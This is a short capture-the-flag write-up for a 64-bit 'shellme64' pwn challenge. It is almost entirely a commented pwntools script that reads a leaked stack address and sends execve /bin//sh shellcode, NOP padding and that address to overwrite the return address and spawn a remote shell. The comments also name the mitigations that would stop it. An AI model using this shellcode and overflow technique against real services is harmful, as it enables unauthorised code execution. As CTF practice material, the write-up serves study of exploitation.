shellme64 [pwn]

shellme64

Same concept, more bytes.

Exploit

# Exploit script for the "shellme64" challenge: the service prints an address,
# the script sends a payload of shellcode followed by that address so that
# control is transferred into the buffer it just sent.
# Written for Python 2 (print statement; str literals used as raw bytes).
from pwn import *
import sys  # NOTE(review): not used anywhere in this script

# Connect to the challenge service at the host/port given in the writeup.
c = remote("chal.tuctf.com", 30507)

# 24-byte payload. It embeds the ASCII string "/bin//sh" (bytes 2f 62 69 6e
# 2f 2f 73 68) and ends with 0f 05, the x86-64 `syscall` opcode, i.e. an
# execve-style shell spawn. Each "\xNN" escape is exactly one byte on the wire.
shellcode = "\x50\x48\x31\xd2\x48\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05"

# Read up to the "> " prompt; the second line of what was received is the
# leaked address. Base 0 lets int() honour a "0x" prefix if the service
# prints one. Presumably this is the address of the buffer about to be
# overflowed -- the binary's layout is not shown on this page, so confirm.
leak = int(c.readuntil("> ").split("\n")[1], 0)
print "LEAK = %x" % (leak)
# Payload layout: shellcode, NOP (0x90) padding up to 40 bytes, then the
# leaked address as an 8-byte little-endian unsigned value -- presumably
# overwriting the saved return address so the function returns into the
# shellcode. `struct` is not imported explicitly here; it relies on
# `from pwn import *` re-exporting it. If the shellcode ever grew past 40
# bytes, "\x90"*(negative) would be the empty string and the layout would
# silently break rather than error.
# Defensive note: this technique relies on the service disclosing a stack
# address and on that region being executable; NX, a stack canary, or the
# absence of the leak under ASLR would each stop it.
buf = shellcode + "\x90"*(40-len(shellcode)) + struct.pack("<Q", leak)

c.send(buf)
c.interactive()  # hand the connection over to the terminal